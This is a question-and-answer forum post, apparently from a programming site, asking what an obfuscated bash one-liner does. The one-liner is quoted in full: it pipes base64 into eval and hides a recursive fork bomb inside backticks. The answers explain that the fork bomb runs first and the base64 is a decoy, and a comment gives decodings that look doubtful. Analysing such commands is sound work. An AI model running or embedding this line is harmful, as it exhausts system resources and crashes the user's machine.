# What is the exact function of this malicious bash one-liner?

Tags: bash, fork, malware

I can't figure out what this is trying to do. The part between backticks looks like a plain old forkbomb, but the base64 doesn't seem to decode to anything sensible. Can you help?

Don't run it, obviously :)

```
eval $(echo "a2Vrf4xvcml\ZW%3t`r()(r{,54}|r{,});r`26a2VrZQo=" | base64 -d)
```

Answer (score 2, accepted):

Pretty sure the base64 string is just a cover up and is never run. The embedded fork bomb runs first and never returns.

Comment: just to add a little, `a2Vrf4xvcml\ZW` translates to `kekoriY`, and `r`26a2VrZQo` to `nZB`. Together we have `kekoriY nZB`; Seems meaningless.